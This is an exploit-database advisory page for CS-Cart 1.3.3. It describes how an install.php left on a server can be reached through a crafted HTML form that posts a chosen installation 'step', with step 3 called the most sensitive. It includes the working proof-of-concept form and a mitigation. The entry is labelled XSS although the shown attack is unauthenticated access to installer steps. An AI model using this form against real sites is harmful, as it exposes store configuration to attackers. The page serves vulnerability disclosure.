CS CART 1.3.3 INSTALL.PHP XSS

vendor:

CS CART

by:

LogicGate

4,3

CVSS

MEDIUM

Cross-Site Scripting (XSS)

CWE

Product Name: CS CART

Affected Version From: 1.3.3

Affected Version To: 1.3.3

Patch Exists: NO

Related CWE: N/A

CPE: a:cs-cart:cs-cart:1.3.3

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2010

CS CART 1.3.3 INSTALL.PHP XSS

If 'install.php' was not removed after installation, an attacker can create an HTML file with a form containing a text input and a submit button. The form action should be set to the path of the 'install.php' file on the victim server. After opening the HTML file, the attacker can enter any step of the installation they would like to access. Step '3' contains the most sensitive information.

Mitigation:

Remove the 'install.php' file after installation.

Source

Exploit-DB raw data:

# Exploit Title: [CS CART 1.3.3 INSTALL.PHP XSS]
# Date: [2010-09-08]
# Author: [LogicGate]
# Software Link: [http://cs-cart.smartcode.com/]
# Version: [1.3.3]
# Tested on: [N/A]
# CVE : [N/A]

If "install.php" was not removed after installation simply make an html file with the following code and replace <Victim Server> by the PATH to "install.php" example:"http://www.nonexistant.com/install.php":

<html>
<form name="installform" method="post" action="http://<Victim Ip>/install.php">
<input type="text" name="step">
<input type="submit" id="nextbut" value="xss">
</form>
</html>

After that open the HTML file you have just created and enter which ever step of the installation you would like to access. Step "3" is where the juiciest information is.